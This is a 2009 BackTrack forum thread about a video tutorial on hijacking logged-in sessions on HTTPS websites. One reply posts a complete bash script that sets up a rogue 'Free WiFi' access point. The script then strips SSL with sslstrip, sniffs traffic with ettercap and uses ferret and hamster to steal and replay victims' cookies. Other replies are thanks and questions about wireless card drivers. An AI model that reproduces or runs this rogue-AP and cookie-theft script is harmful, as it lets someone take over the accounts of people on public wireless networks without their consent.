Backtrack Series - 12: Session Hijacking for Secure Websites

**fifo_thekid** · 07-06-2009, 07:57 PM

In this tutorial we will hijack a live session so that we can have the same priviliges of the account without having any information about the username and password. We will start by redirecting the secure traffic to an insecure server using SSLStrip, next we use ferret to extract cookies from the traffic and then we will use hamster to inject the cookies in the browser

This is the link for the online video:
Online Video

And here you can find the required files (video12.txt which has the complete explanation)
Attachments

**imaginary** · 07-08-2009, 12:11 PM

can you put that modified Roguev3.sh ? please

and thanks it's good series i love it :*

**fifo_thekid** · 07-08-2009, 07:14 PM

Originally Posted by imaginary

can you put that modified Roguev3.sh ? please

and thanks it's good series i love it :*

It's available in the attachments of my previous tutorial
Backtrack Series 11: Retrieving Forum Passwords Using MITM + Rcrack

Thnx for the support

**freemymind** · 07-09-2009, 02:13 AM

Another great video!
Good quality and great content.
Thank you, looking to try this soon. As mentioned in the other post also looking forward to more, keep up the great work.

**imported_g0tmi1k** · 07-09-2009, 08:54 PM

*YEY*
Another vid for the backtrack series!
Will give it a go myself some stage tomorrow!
Well done && thanks! (=

edit:
Work well for me (=

Download the video [HD] (with the guide & Roguev3.sh)
http://www.mediafire.com/download.php?gyunjtyzmmu

**imported_K1LLb0x** · 07-14-2009, 06:44 PM

wow, your videos are awesome, keep up the good work and keep on using different programs...

**Nick_the_Greek** · 07-15-2009, 08:58 PM

Your videos are more than excellent. I was playing with your script and since I have a dsl modem to connect to internet I modify a bit your script to work with point to point connections. So, here it is:

Code:

#!/bin/bash
echo -n "Enter the name of the interface connected to the internet, for example ppp0: "
read -e IFACE
echo -n "Enter your Internet IP address for ppp0, IP(XXX.XXX.XXX.XXX): "
read -e INETIP
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
echo -n "Enter your wireless interface MAC(XX:XX:XX:XX:XX:XX) [Optional,]: "
read -e MAC
echo -n "Enter the channel you would like your rogue AP to be called [Optional]: "
read -e CHAN

# installing DNSMASQ
apt-get install dnsmasq-base

killall -9 dhcpcd dhcpd3 airbase-ng ettercap dnsmasq
# stop mon0
airmon-ng stop mon0
airmon-ng stop $WIFACE

ifconfig $WIFACE down
airmon-ng start $WIFACE
modprobe tun &

cmd="konsole -e airbase-ng -e ""$ESSID"" -P -C 30 -v "
if [ -n "$CHAN" ]; then
cmd=$cmd"-c "$CHAN" "
fi
if [ -n "$MAC" ]; then
cmd=$cmd"-a "$MAC" "
fi
cmd=$cmd"$WIFACE"
$cmd &

echo "Witing 10 seconds for the SoftAP to be established"
sleep 10
echo "SoftAP should be working now"

ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
ifconfig at0 mtu 1400
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

# create custom dhcpd.conf for WLAN
# my ISP's DNS servers are: 195.170.0.1 and 195.170.2.2

cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 195.170.0.1, 195.170.2.2;
range 192.168.1.130 192.168.1.140;
}
EOF

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT # rogue gateway

# my internet's dynamic IP
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $INETIP

rm /var/run/dhcpd.pid
touch /var/run/dhcpd.pid
chgrp dhcpd /var/run/dhcpd.pid
chown dhcpd /var/run/dhcpd.pid

# run custom dhcpd file
konsole -e dhcpd3 -d -f -cf dhcpd.conf at0 &

## solve our dns forwarder
dnsmasq restart

konsole -e ettercap -T -p -q -i at0 // // &
echo "Witing 8 seconds for portforwarding and DHCP server"
sleep 8
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "Portforwarding and DHCP should be working now"

# Starting SSLStrip
konsole -e sslstrip -p &
echo "Starting SSLStrip"
sleep 3

# Forward all 80 port traffic to port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo "Forward all 80 port traffic to port 10000"
sleep 3

# Starting ferret
konsole -e /pentest/sniffers/hamster/./ferret -i at0 &
echo "Starting ferret"
sleep 3

# Starting hamster
konsole -e /pentest/sniffers/hamster/hamster &
echo "Starting Hamster"
sleep 3

My IP is dynamic and the DNS Servers of my ISP are 195.170.0.1 and 195.170.2.2.
Sorry for any mistakes that I have made (in the script and in English grammar and syntax). I am in the scene since Amstrad 464 (yes with tape) and i am a little bit rusty (if this is the correct word)
BTW the only problem that I have is when i create a AP (atheros based card AR5001X+)with airbase-ng the data rate is very slow. I tried both drivers mac and madwifi. I change rate ,rts, etc and the rate and nothing change. But when I create a AP with:

Code:

wlanconfig ath0 create wlandev wifi0 wlanmode ap
iwconfig ath0 essid Come_to_Dady
iwconfig ath0 rate 54M

it work just great. It is airbase-ng related or driver related problem?
I am using the SVN version of Aircrack-ng and i was trying in different channels, RTS etc.
Any Idea
Anyway.
My respects to all of you guys and specially to Pureh@te who is helping everybody even those kids who they are too lazy to search around.
Great work.

**fifo_thekid** · 07-16-2009, 08:45 AM

Thnx for the additional information
Please note that this script is a modified version of Deathray script
I've noticed that it's slow with some configurations, like when the client uses Windows Vista
I'll try your method and then give you my feedback

**Nick_the_Greek** · 07-19-2009, 07:05 PM

Any news fifo_thekid?
Have you achieve any higher data rates?
I believe that to accomplish this kind of your lessons the softAP that you have made must act as an AP. Correct my if I am wrong. Also there is some kind of setting that i must configure in my atheros based Wifi card to make act more accurate as an AP except :

Code:

wlanconfig ath0 create wlandev wifi0 wlanmode ap
iwconfig ath0 essid Home_wifi
iwconfig ath0 channel 11
iwconfig ath0 rate 54M

I have read all the outputs that give me the iwpriv and iwconfig.
Understand some ,reading for the rest.
Since I am trying to get back in the scene (for hobby) and the "have a life, growing kids" matter dosn't left me much free time to read, the question is:
Am I in wrong path?
Any idea?
I am verry shame for my english.

Hope you understand me.

**eagle_1313** · 07-30-2009, 08:48 AM

Nice stuff... thx...

BackTrack Linux - Penetration Testing Distribution

Thread: Backtrack Series - 12: Session Hijacking for Secure Websites

Thread Tools

Search Thread

Display

Backtrack Series - 12: Session Hijacking for Secure Websites

Using the Rogue3.sh script + seesion 12 with ppp0 (PPPoA or PPPoE)

Posting Permissions